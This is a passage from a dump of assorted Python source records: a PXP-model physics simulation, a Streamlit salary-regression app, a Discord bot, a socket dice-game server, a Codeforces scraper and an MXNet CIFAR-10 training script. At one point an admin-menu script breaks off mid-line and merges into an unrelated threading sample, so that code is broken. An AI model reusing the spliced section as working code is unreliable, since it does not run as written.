np.array([2,2])\nHp[4].uc_pos = np.array([0,1])\n\nHp[5] = Hamiltonian(pxp,pxp_syms)\nHp[5].site_ops[1] = np.array([[0,0],[1,0]])\nHp[5].site_ops[2] = np.array([[0,1],[0,0]])\nHp[5].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[5].model = np.array([[0,0,1,0,3,0],[0,3,0,1,0,0],[0,0,2,0,3,0],[0,3,0,2,0,0]])\nHp[5].model_coef = np.array([1,1,1,1])\nHp[5].uc_size = np.array([2,2,2,2])\nHp[5].uc_pos = np.array([0,1,1,0])\n\nHp[6] = Hamiltonian(pxp,pxp_syms)\nHp[6].site_ops[1] = np.array([[0,0],[1,0]])\nHp[6].site_ops[2] = np.array([[0,1],[0,0]])\nHp[6].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[6].model = np.array([[0,0,0,1,0,0],[0,0,1,0,0,0],[0,0,0,2,0,0],[0,0,2,0,0,0]])\nHp[6].model_coef = np.array([1,1,1,1])\nHp[6].uc_size = np.array([2,2,2,2])\nHp[6].uc_pos = np.array([1,0,0,1])\n\nHp[7] = Hamiltonian(pxp,pxp_syms)\nHp[7].site_ops[1] = np.array([[0,0],[1,0]])\nHp[7].site_ops[2] = np.array([[0,1],[0,0]])\nHp[7].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[7].model = np.array([[0,1,0,3,0,0],[0,0,3,0,1,0],[0,0,3,0,2,0],[0,2,0,3,0,0]])\nHp[7].model_coef = np.array([1,1,1,1])\nHp[7].uc_size = np.array([2,2,2,2])\nHp[7].uc_pos = np.array([1,0,1,0])\n\nHp[8] = Hamiltonian(pxp,pxp_syms)\nHp[8].site_ops[1] = np.array([[0,0],[1,0]])\nHp[8].site_ops[2] = np.array([[0,1],[0,0]])\nHp[8].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[8].model = np.array([[0,0,0,0,1,0],[0,1,0,0,0,0],[0,0,0,0,2,0],[0,2,0,0,0,0]])\nHp[8].model_coef = np.array([1,1,1,1])\nHp[8].uc_size = np.array([2,2,2,2])\nHp[8].uc_pos = np.array([0,1,1,0])\n\nHp[9] = 
Hamiltonian(pxp,pxp_syms)\nHp[9].site_ops[1] = np.array([[0,0],[1,0]])\nHp[9].site_ops[2] = np.array([[0,1],[0,0]])\nHp[9].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[9].model = np.array([[0,0,1,0,3,0,0],[0,0,3,0,1,0,0],[0,0,2,0,3,0,0],[0,0,3,0,2,0,0]])\nHp[9].model_coef = np.array([1,1,1,1])\nHp[9].uc_size = np.array([2,2,2,2])\nHp[9].uc_pos = np.array([0,0,1,1])\n\nz=zm_state(2,1,pxp)\nk=pxp_syms.find_k_ref(z.ref)\nfor n in range(0,len(Hp)):\n # Hp[n].gen()\n for m in range(0,np.size(k,axis=0)):\n Hp[n].gen(k[m])\n\n# coef = np.zeros(9)\ncoef = np.load(\"../../../../pxp,2nd_order_perts/z2/data/all_terms/18/18_all_terms/pxp,z2,2nd_order_perts,fid_coef,18.npy\")\n# coef[0] = 0.108\nHp_total = deepcopy(Hp[0])\nfor n in range(1,len(Hp)):\n Hp_total = H_operations.add(Hp_total,Hp[n],np.array([1,coef[n-1]]))\nHm = Hp_total.herm_conj()\n\nH = H_operations.add(Hp_total,Hm,np.array([1,1]))\nz=zm_state(2,1,pxp,1)\nfsa_dim = pxp.N\nfrom Calculations import gen_fsa_basis\nfsa_basis = gen_fsa_basis(Hp_total.sector.matrix(k[0]),z.sym_basis(k[0],pxp_syms),fsa_dim)\nH_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H.sector.matrix(k[0]),fsa_basis))\n\nH.sector.find_eig(k[0])\nexact_overlap = eig_overlap(z,H,k[0]).eval()\nexact_energy = H.sector.eigvalues(k[0])\n\ne,u = np.linalg.eigh(H_fsa)\nfsa_overlap = np.log10(np.abs(u[0,:])**2)\nfsa_energy = e\n\nplt.scatter(exact_energy,exact_overlap)\nplt.scatter(fsa_energy,fsa_overlap,marker=\"x\",color=\"red\",s=100)\nplt.show()\n\nt=np.arange(0,20,0.01)\nf=fidelity(z,H,\"use sym\").eval(t,z)\nplt.plot(t,f)\nplt.show()\n\n#identify scar states for entropy highlight\nscar_indices = get_top_band_indices(exact_energy,exact_overlap,pxp.N,100,100,e_diff = 0.5)\n#check identified right states\nplt.scatter(exact_energy,exact_overlap)\nfor n in range(0,np.size(scar_indices,axis=0)):\n plt.scatter(exact_energy[scar_indices[n]],exact_overlap[scar_indices[n]],marker=\"D\",color=\"green\",alpha=0.5,s=100)\nplt.show()\n\nU = pxp_syms.basis_transformation(k[0])\neigvectors_comp = np.dot(U,H.sector.eigvectors(k[0]))\nfsa_eigs_comp = np.dot(U,np.dot(fsa_basis,u))\n\n#entropy\nent_vals = np.zeros(np.size(eigvectors_comp,axis=1))\nent = entropy(pxp)\npbar=ProgressBar()\nfor n in pbar(range(0,np.size(ent_vals,axis=0))):\n ent_vals[n] = ent.eval(eigvectors_comp[:,n])\n\nent_fsa = np.zeros(np.size(e))\nfor n in range(0,np.size(ent_fsa,axis=0)):\n ent_fsa[n] = ent.eval(fsa_eigs_comp[:,n])\n\nplt.scatter(exact_energy,ent_vals)\nscar_entropy = np.zeros(np.size(scar_indices))\nscar_energy = np.zeros(np.size(scar_indices))\nfor n in range(0,np.size(scar_indices,axis=0)):\n scar_entropy[n] = ent_vals[scar_indices[n]]\n scar_energy[n] = exact_energy[scar_indices[n]]\nplt.scatter(scar_energy,scar_entropy,marker=\"D\",color=\"orange\",alpha=0.4,s=200,label=\"ED Scars\")\nplt.scatter(e,ent_fsa,marker=\"x\",color=\"red\",s=200,label=r\"$su(2)$ Ritz vectors\")\nplt.legend()\nplt.xlabel(r\"$E$\")\nplt.ylabel(r\"$S$\")\nplt.show()\n\n# np.save(\"pxp,0th_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,0th_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,0th_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,0th_order,e,\"+str(pxp.N),fsa_energy)\n# np.save(\"pxp,z2_fsa,0th_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n\n# np.save(\"pxp,1st_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,1st_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,1st_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,1st_order,e,\"+str(pxp.N),fsa_energy)\n# 
np.save(\"pxp,z2_fsa,1st_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n\n# np.save(\"pxp,2nd_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,2nd_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,2nd_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,2nd_order,e,\"+str(pxp.N),fsa_energy)\n# np.save(\"pxp,z2_fsa,2nd_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n","sub_path":"projects/broken_su2_general_models/error_metric_plots/dynamic_summary/z2/pxp,z2_errors.py","file_name":"pxp,z2_errors.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103664126","text":"#import package\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom math import sqrt\nimport time\nimport matplotlib.pyplot as plt\n\n#import the data\ndata = pd.read_csv(\"salarios.csv\")\nst.title(\"Predicción salario \")\nst.markdown(\"**Guarda las imagenes en la carpeta assets como png**\")\n#checking the data\nst.write(\"Esta es una aplicación para averiguar qué rango de salario elige usando el aprendizaje automático.\")\ncheck_data = st.checkbox(\"Visualizar el dataset\")\nif check_data:\n st.write(data.head(2))\n st.write(data.describe())\nst.write(\"Se calcula el salario cambiando la experiencia.\")\n\nplot= st.sidebar.checkbox(\"Mostrar Plot Scatter Train y Test\", False)\n\n\n#input the numbers\n\nexperience = st.slider(\"Experience\",int(data.Experiencia.min()),int(data.Experiencia.max()) )\n#experience = st.slider(\"Experience\",int(data.Experiencia.min()),int(data.Experiencia.max()),int(data.Experiencia.mean()) )\n\n#splitting your data\nX = data.drop('Salario', axis = 1)\ny = data['Salario']\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=.2, random_state=45)\n\n\n#modelling\n#import your model\nmodel=LinearRegression()\n#fitting and predict your model\nmodel.fit(X_train, y_train)\nmodel.predict(X_test)\nerrors = np.sqrt(mean_squared_error(y_test,model.predict(X_test)))\npredictions = model.predict([[experience]])[0]\n\n\n\nif plot:\n st.write(\"scatter Datos de Train\")\n fig, ax = plt.subplots()\n ax.scatter(X_train, y_train, color='purple')\n ax.plot(X_train, model.predict(X_train), color='orange')\n plt.title('Salario vs Experiencia')\n plt.xlabel('Experiencia') # creamos nuevos datos adicionales\n plt.ylabel('Salario')\n fig.savefig('/Users/sandrarairan/Documents/desarrollo/streamlit/linearRegression/assets/scatter_train.png')\n st.pyplot(fig)\n \n\nif plot:\n st.write(\"scatter Datos de Test\")\n fig, ax = plt.subplots()\n ax.scatter(X_test, y_test, color='green')\n ax.plot(X_train, model.predict(X_train), color='red')\n plt.title('Salario vs Experiencia')\n plt.xlabel('Experiencia') # creamos nuevos datos adicionales\n plt.ylabel('Salario')\n #fig.write_image('scatter_test.png')\n fig.savefig('/Users/sandrarairan/Documents/desarrollo/streamlit/linearRegression/assets/scatter_test.png')\n st.pyplot(fig) \n \n\n#checking prediction house price\nif st.button(\"Predecir!\"):\n st.header(\"EL salario predicción es: {}\".format(int(predictions)))\n st.subheader(\"rango predicción: es COL {} - COL {}\".format(int(predictions-errors),int(predictions+errors) ))\n\n st.write(\"score\",model.score(X_test, y_test))\n\n mse_list=[]\n rmse_list=[]\n r2_list=[]\n\n mse = 
mean_squared_error(y_test,model.predict(X_test))\n rmse = sqrt(mse)\n r2=r2_score(y_test,model.predict(X_test))\n mse_list.append(mse)\n rmse_list.append(rmse)\n r2_list.append(r2)\n\n res=pd.DataFrame(columns=[\"MSE\",\"RMSE\",\"r2_SCORE\"])\n st.write(\"MSE: el error cuadrático medio de un estimador mide el promedio de los errores al cuadrado, es decir, la diferencia entre el estimador y lo que se estima\")\n\n res[\"MSE\"]=mse_list\n ##RMSE es una medida de la dispersión de estos residuos. En otras palabras, le dice qué tan concentrados están los datos alrededor de la línea de mejor ajuste.\n st.write(\"RMSE es una medida de la dispersión de estos residuos. En otras palabras, le dice qué tan concentrados están los datos alrededor de la línea de mejor ajuste.\")\n \n \n res[\"RMSE\"]=rmse_list\n res[\"r2_SCORE\"]=r2_list\n\n st.write(res)\n \n\n ","sub_path":"linearregression.py","file_name":"linearregression.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"611841250","text":"# Import discord package\nimport discord\nfrom discord.ext import commands\nimport random\n\n# The bot\nbot = commands.Bot(command_prefix = '8! ', case_insensitive = True)\ngenChannel = 852997471314509884\n\n# when the bot starts\n@bot.event\nasync def on_ready(): # async allows the function to run even though there is a delay\n general_channel = bot.get_channel(genChannel)\n\n await general_channel.send('Hello, I am What-If Bot. I am an absolute meme. write \"8! commands\" to get started')\n\n# help\n@bot.command(name = 'commands')\nasync def commands(context):\n infoEmbed = discord.Embed(title = \"List of Functions\", color = 0xA977F1)\n infoEmbed.add_field(name = \"what if ...\", value = \"answers your what if question\", inline = False)\n infoEmbed.add_field(name = \"8! joke\", value = \"gives a funny dad joke\", inline = False)\n infoEmbed.add_field(name = \"8! 
version\", value = \"states the version\", inline = False)\n infoEmbed.set_footer(text = \"Ann B and Huy M\")\n\n await context.message.channel.send(embed = infoEmbed)\n\n# version\n@bot.command(name = 'version')\nasync def version(context):\n verEmbed = discord.Embed(title = \"Current Version:\", color = 0xA977F1)\n verEmbed.add_field(name = \"Version Code\", value = \"v1.0.2\", inline = False)\n verEmbed.add_field(name = \"Release Date\", value = \"June 12, 2021\", inline = False)\n verEmbed.set_author(name = \"What-If Bot\")\n verEmbed.set_footer(text = \"Ann B and Huy M\")\n\n await context.message.channel.send(embed = verEmbed)\n\n# jokes\n@bot.command(name = 'joke')\nasync def joke(context):\n \n file = open('dadjokes.txt')\n content = file.readlines()\n r1 = random.randint(0,len(content) - 1)\n\n await context.message.channel.send(content[r1])\n\n# what if\n@bot.event\nasync def on_message(message):\n if \"what if\" in message.content.lower():\n file = open('what-ifs.txt')\n content = file.readlines()\n r2 = random.randint(0,len(content) - 1)\n\n await message.channel.send(content[r2])\n\n await bot.process_commands(message)\n\n# When the bot disconnects from the server\n@bot.event\nasync def on_disconnect():\n general_channel = bot.get_channel(genChannel)\n await general_channel.send('Goodbye, and have a nice day!')\n\n\n# Run the bot on server\nbot.run('token')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620627037","text":"#!/usr/bin/python3\n\n\nimport os\nimport sys\nimport argparse\nimport re\n\n#parse the parameters\ndef parseArgs():\n\tparser = argparse.ArgumentParser(\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter,\n \tdescription='measure the resource usage')\n\tparser.add_argument('--clean', action = 'store_true',\n\t\t\t\t\t\t\t help = 'clean the .data files')\n\treturn parser.parse_args()\n\ndef find_file(filelist, string):\n\tfor file in filelist:\n\t\tif string in file:\n\t\t\treturn file\n\n\ndef latency(root, filelist):\n\tworker_num = len(filelist) // 2\n\tfor i in range(2, worker_num+2):\n\t\tfile_worker = find_file(filelist, str('gpu%d'%(i)))\n\t\tfile_server = find_file(filelist, str('192.168.2.4%d'%(i)))\n\t\tfd_worker = open(root+'/'+file_worker, 'r')\n\t\tfd_server = open(root+'/'+file_server, 'r')\n\t\tfd_output = open(root+'/latency_gpu%d.csv'%(i), 'w')\n\t\tcount = 0\n\t\twhile True:\n\t\t\tline_worker = fd_worker.readline()\n\t\t\tline_server = fd_server.readline()\n\t\t\tif not line_server or not line_worker:\n\t\t\t\tbreak;\n\t\t\tcount += 1\n\n\t\t\tlatency_result = list()\n\t\t\tpart_worker = line_worker.split(',')\n\t\t\tpart_server = line_server.split(',')\n\n\t\t\tif part_server[1] == part_worker[1] and part_worker[2] == part_server[2]:\n\t\t\t\tlatency_result.append(part_server[1])\n\t\t\t\tlatency_result.append(part_server[2])\n\t\t\t\tlatency_result.append(str((int(part_server[3]) - int(part_worker[3]))/1000000))\n\t\t\telse: print(\"analysis error\"); exit()\n\n\t\t\tfd_output.write(','.join(latency_result) + '\\n')\n\n\n\t\tfd_server.close()\n\t\tfd_worker.close()\n\t\tfd_output.close()\n\n\ndef cleanfile(root):\n\tcmd = \"rm -f %s/latency_gpu*\"%(root)\n\tos.system(cmd)\n\n\n\nif __name__ == '__main__':\n\targs = parseArgs()\n\tfor root, dirs, files in os.walk('./'):\n\t\tprint(root, dirs, files)\n\t\tif len(dirs) == 0: #the dirs contains the .csv files\n\t\t\tif 
args.clean:\n\t\t\t\tcleanfile(root)\n\t\t\telse:\n\t\t\t\tlatency(root, files)\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"231798057","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 25 21:14:59 2020\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n#Importamos cada una de las variables del archivo \r\nfrom lifestore_file import lifestore_searches, lifestore_sales, lifestore_products\r\n\r\n#print(lifestore_products) #Se comprueba que imprime la variable correctamente\r\n\r\n\r\n\r\nusuarios_admin=[[\"Patricia\",\"123\"],[\"Alejandra\",\"hola\"],[\"Daniel\",\"perro\"],[\"Mai\",\"gato\"]]\r\n\r\nes_admin=0\r\n\r\nwhile es_admin==0:\r\n usuario_entrada=input(\"Ingresa tu nombre de usuario: \")\r\n usuario_clave=input(\"Ingresa tu clave de acceso: \")\r\n\r\n for usuario in usuarios_admin:\r\n if usuario[0]==usuario_entrada and usuario[1]==usuario_clave:\r\n es_admin=1\r\n else:\r\n continue\r\n \r\nif es_admin==1:\r\n print(\"Bienvenido a Lifestore\")\r\n \r\n print(\"Elige una opcion del menu: \\n 1.Conocer los 50 productos con mayores y menores ventas: a \\n 2.Productos con mejores y peores resenas: b \\n 3.Productos mas y menos buscados: c\")\r\n opcion_seleccionada=input(\"Opcion: \")\r\n op_correcta=0\r\n \r\n while op_correcta==0:\r\n if opcion_seleccionada==\"a\":\r\n print(\"Seleccionaste a\")\r\n opcion=1\r\n op_correcta=1\r\n \r\n contador=0\r\n total_ventas=[] #[[id,contador],[id2, contador2]]\r\n \r\n for producto in lifestore_products:\r\n for venta in lifestore_sales:\r\n if producto[0]==venta[1]:\r\n contador+=1\r\n \r\n formato=[producto[0], producto[1], contador]\r\n #formato=[producto[0],contador]\r\n total_ventas.append(formato)\r\n contador=0\r\n \r\n \r\n ventas_ordenada=[]\r\n \r\n while total_ventas:\r\n minimo=total_ventas[0][2]\r\n lista_actual=total_ventas[0]\r\n for venta in total_ventas:\r\n if venta[2]= 10):\n\t\t\ton = False\n\np = threading.Thread(target=print_tick)\ns = threading.Thread(target=stoppen)\n\np.start()\ns.start()\t\t\t\ns.join()","sub_path":"Samples/processen.py","file_name":"processen.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5205554","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport sys\n\n\ndef _str_to_version_tuple(version):\n return tuple([int(i) for i in version.split('.')])\n\n\nlxml_requirement = \"lxml\"\nif sys.platform == 'darwin':\n import platform\n # Solve bad case of comparison like 10.9 v.s. 
10.10.1\n mac_ver = _str_to_version_tuple(platform.mac_ver()[0])\n cutoff_ver= _str_to_version_tuple('10.9')\n if mac_ver < cutoff_ver:\n print(\"Using lxml<2.4\")\n lxml_requirement = \"lxml<2.4\"\n\nsetup(\n name=\"PyReadability\",\n version=\"0.4.0\",\n author=\"Yuri Baburov\",\n author_email=\"burchik@gmail.com\",\n description=\"fast python port of arc90's readability tool\",\n test_suite = \"tests.test_article_only\",\n long_description=open(\"README\").read(),\n license=\"Apache License 2.0\",\n url=\"http://github.com/hyperlinkapp/python-readability\",\n packages=['readability'],\n install_requires=[\n \"chardet\",\n \"cssselect\",\n lxml_requirement\n ],\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n)\n","sub_path":"pypi_install_script/PyReadability-0.4.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232005612","text":"import socket\nfrom threading import Thread,Lock\nimport random\nimport sys\nfrom multiprocessing import Process,Queue\n\nHOST ='0.0.0.0'\nPORT = 5000\nBUFSIZ = 1024\nADDR = (HOST, PORT)\nlock_ranking = Lock()\n\n\nclass Ranking:\n \n def __init__(self,lock):\n self.high_scores = []\n self.lock = lock\n \n def add_highscore(self,highscore_novo):\n self.lock.acquire()\n presente = False\n for highscore in self.high_scores:\n if(highscore[0] == highscore_novo[0]):\n highscore_atualizado = (highscore[0],(highscore[1]+highscore_novo[1]))\n self.high_scores.append(highscore_atualizado)\n self.high_scores.remove(highscore)\n presente = True\n if(not presente):\n self.high_scores.append(highscore_novo)\n self.sort()\n self.lock.release()\n\n def sort(self):\n self.high_scores.sort(key=lambda tup: tup[1], reverse=True)\n \n def __str__(self):\n string = \"\"\n\n for highscore in self.high_scores:\n string += \"{}\\t{} \\n\".format(str(highscore[1]),highscore[0])\n return string\n\nclass SocketHandleProcess(Process):\n def __init__(self,queue_highscores,client_sock,addr,rank):\n Process.__init__(self)\n self.queue_highscores = queue_highscores\n self.client_sock = client_sock\n self.addr = addr\n self.rank = rank\n def run(self):\n socketHandle(self.client_sock,self.addr,True,self.queue_highscores)\n\n \ndef rankingWatcher(queue_highscores):\n while True:\n rank.add_highscore(queue_highscores.get())\n\n\n\ndef socketHandle(client_sock,addr,flag_process,queue_highscores='none'):\n print('Client connected from: ', addr)\n while True:\n \n data = client_sock.recv(BUFSIZ).strip()\n data = data.decode(\"utf-8\")\n token = data.split(':')\n \n if token[0].upper() == 'END':\n break\n elif token[0].upper() == 'RANKING':\n \n print(\"OK - {} Pediu Rank\".format(addr))\n client_sock.send((\"\\nRanking Geral\\n\\n{}\\n\\n\".format(rank)).encode('utf-8'))\n\n elif token[0].upper() == 'NOME':\n print(\"{} chama-se {}\".format(addr[0],token[1]))\n \n nome = token[1]\n numeros = []\n for x in range(5):\n numeros.append(random.randint(1,6))\n \n pontuacoes = []\n for numero in numeros:\n correspondencias=0\n for outronumero in numeros:\n if(numero == outronumero):\n correspondencias +=1\n pontuacoes.append(correspondencias)\n score=0\n if(max(pontuacoes) ==3):\n score=10\n elif(max(pontuacoes)==4):\n score=100\n elif(max(pontuacoes)==5):\n score=1000\n\n if score!=0:\n highscore = (nome.upper(),score)\n if(flag_process):\n 
queue_highscores.put(highscore)\n \n else:\n rank.add_highscore(highscore)\n\n\n response= \"\\n\\nResultado da Partida\\nDados Sorteados: {} \\nPontuação: {}\\n\".format(numeros,score)\n print(numeros)\n client_sock.send(response.encode('utf-8'))\n\n \n print(\"Received from client {}: {}\".format(addr[0],token))\n \n client_sock.close()\n sys.exit()\n\n\n\n \n \n\nif __name__ == '__main__':\n # server setup\n server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n server_socket.bind(ADDR)\n server_socket.listen(5)\n server_socket.setsockopt( socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n rank = Ranking(lock_ranking)\n \n \n while True:\n opt = input(\"Configuração do servidor!\\nDigite 1 para executar usando Threads, ou 2 para Processos.\")\n if (opt == '1'):\n # threads\n while True:\n print(\"rank: {}\\n\".format(rank.high_scores))\n print('Server waiting for connection...{}'.format(ADDR))\n client_sock, addr = server_socket.accept()\n t1 = Thread(target=socketHandle,args=(client_sock,addr, False))\n t1.start()\n \n\n pass\n elif(opt == '2'):\n queue_highscores = Queue()\n t1 = Thread(target=rankingWatcher,args=[queue_highscores])\n t1.start()\n while True:\n print(\"rank: {}\\n\".format(rank.high_scores))\n print('Server waiting for connection...{}'.format(PORT))\n client_sock, addr = server_socket.accept()\n \n p1 = SocketHandleProcess(queue_highscores,client_sock,addr,rank.high_scores)\n p1.start()\n \n \n else:\n print(\"Opção Inválida!\")\n","sub_path":"servidor/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"274345673","text":"from pyquery import PyQuery as pq\nimport requests\nimport time\n\n\ndef solve_tr(tr):\n \"\"\"\n Extract the fields we need from one submission row\n :param tr: a tr element\n :return: dict\n \"\"\"\n problemName = tr.find('.status-small>a').text()\n state = tr.find(':nth-child(6)').text()\n it = {'problemName': problemName, 'state': state}\n return it\n\n\ndef get_pages_num(doc):\n \"\"\"\n Get the number of pages that need to be crawled\n :param doc: the parsed document returned by pyquery\n :return: int, number of pages\n \"\"\"\n try:\n length = doc.find('#pageContent>.pagination>ul>*').length\n last_li = doc.find('#pageContent>.pagination>ul>li:nth-child(' + str(length-1) + ')')\n # print('length', length)\n print(last_li.text())\n # for item in items:\n # print(item)\n\n return max(1, int(last_li.text()))\n\n except Exception :\n return None\n\n\ndef crawl_one_page(doc):\n \"\"\"\n Crawl the contents of a single page\n :param doc: the parsed document returned by pyquery\n \"\"\"\n items = doc.find('[data-submission-id]').items()\n for item in items:\n it = solve_tr(item)\n with open('data.txt', 'a+', encoding='utf-8') as f:\n f.write(str(it) + '\\n')\n print(it)\n\n\ndef get_username():\n \"\"\"\n Get the username\n :return:\n \"\"\"\n username = input('Enter the username: ')\n return username\n\n\ndef main():\n base = 'https://codeforces.com/submissions/'\n username = get_username()\n url = base+username+'/page/1'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'\n }\n\n response = requests.get(url=url, headers=headers)\n doc = pq(response.text)\n # the commented-out lines below are test code\n # crawl_one_page(doc)\n # with open('index.html', 'w', encoding='utf-8') as f:\n # f.write(doc.text())\n num = get_pages_num(doc)\n\n if num is not None:\n for i in range(1, num + 1):\n url = base+username+'/page/'+str(i)\n print(url)\n response = requests.get(url=url)\n doc = pq(response.text)\n crawl_one_page(doc)\n time.sleep(2)\n\n else:\n 
print('username does not exist or there are no submissions')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces.py","file_name":"codeforces.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595307185","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## 1. Import Necessary Modules\n\n# In[1]:\n\n\nimport os\n\nimport matplotlib.pyplot as plt\n\nfrom altusi import utils\nimport altusi.utils.visualizer as vis\nimport altusi.configs.config as cfg\nfrom altusi.utils.logger import *\n\n\n# In[2]:\n\n\nimport numpy as np\n\nimport mxnet as mx\nfrom mxnet import nd, autograd, gluon, context\nfrom mxnet.gluon.data.vision import transforms, CIFAR10\nfrom gluoncv.data import transforms as gcv_transforms\n\n\n# ## 2. Prepare Data\n\n# ### 2.1 Define Data Transformers\n\n# In[3]:\n\n\ntrain_transformer = transforms.Compose([\n gcv_transforms.RandomCrop(cfg.IMAGE_SIZE, pad=4),\n transforms.RandomFlipLeftRight(),\n transforms.ToTensor(),\n transforms.Normalize(cfg.CIFAR10_MEAN, cfg.CIFAR10_STD)\n])\n\ntest_transformer = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(cfg.CIFAR10_MEAN, cfg.CIFAR10_STD)\n])\n\nLOG(INFO, 'Data Transformers defining done')\n\n\n# ### 2.2 Load Dataset\n\n# In[4]:\n\n\ntrain_dataset = CIFAR10(train=True)\ntest_dataset = CIFAR10(train=False)\n\nLOG(INFO, 'Dataset loading done')\n\n\n# ### 2.3 Define Data Loaders\n\n# In[6]:\n\n\nBATCH_SIZE = cfg.BATCH_SIZE\n\ntrain_loader = gluon.data.DataLoader(\n train_dataset.transform_first(train_transformer),\n batch_size=BATCH_SIZE,\n shuffle=True,\n num_workers=4\n)\n\ntest_loader = gluon.data.DataLoader(\n test_dataset.transform_first(test_transformer),\n batch_size=BATCH_SIZE,\n num_workers=4\n)\n\nLOG(INFO, 'Data Loaders defining done')\n\n\n# ## 3. 
Setup Training System\n\n# In[7]:\n\n\nfrom altusi.models import AlexNet\nfrom altusi.models import VGG11, VGG13, VGG16, VGG19\nfrom altusi.models import ResNet18, ResNet34, ResNet50, ResNet101, ResNet152\nfrom altusi.models import DenseNet121, DenseNet161, DenseNet169, DenseNet201\nfrom altusi.models import GoogleNet\n\n# AlexNet architecture\n# net = AlexNet(nclasses=cfg.CIFAR_NCLASSES); model_name = 'AlexNet'\n\n# VGG architectures\n# net = VGG11(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG11'\n# net = VGG13(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG13'\n# net = VGG16(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG16'\n# net = VGG19(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG19'\n\n# ResNet architectures\n# net = ResNet18(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet18'\n# net = ResNet34(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet34'\n# net = ResNet50(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet50'\n# net = ResNet101(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet101'\n# net = ResNet152(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet152'\n\n# DenseNet architectures\n# net = DenseNet121(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet121'\n# net = DenseNet161(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet161'\n# net = DenseNet169(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet169'\n# net = DenseNet201(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet201'\n\n\n# GoogleNet architecture\nnet = GoogleNet(nclasses=cfg.CIFAR_NCLASSES); model_name = 'GoogleNet'\n\nLOG(INFO, '{} Network setup done'.format(model_name))\n\n\n# In[8]:\n\n\nnet.hybridize()\nnet.initialize()\n\nX = nd.random.uniform(shape=(1, 3, 32, 32))\n\nnet(X)\n\n\n# In[9]:\n\n\nnet\n\n\n# In[10]:\n\n\nctx = context.gpu(0) if context.num_gpus() else context.cpu()\n\nLOG(INFO, 'Device in Use:', ctx)\n\n\n# In[11]:\n\n\ncriterion = gluon.loss.SoftmaxCrossEntropyLoss()\noptimizer = 'sgd'\n\nnet.initialize(init=mx.init.Xavier(), ctx=ctx, force_reinit=True)\nnet.hybridize()\n\ntrainer = gluon.Trainer(\n net.collect_params(),\n optimizer,\n {'learning_rate':cfg.LR, 'wd':cfg.WD, 'momentum':cfg.MOMENTUM}\n)\n\nLOG(INFO, 'Training system setup 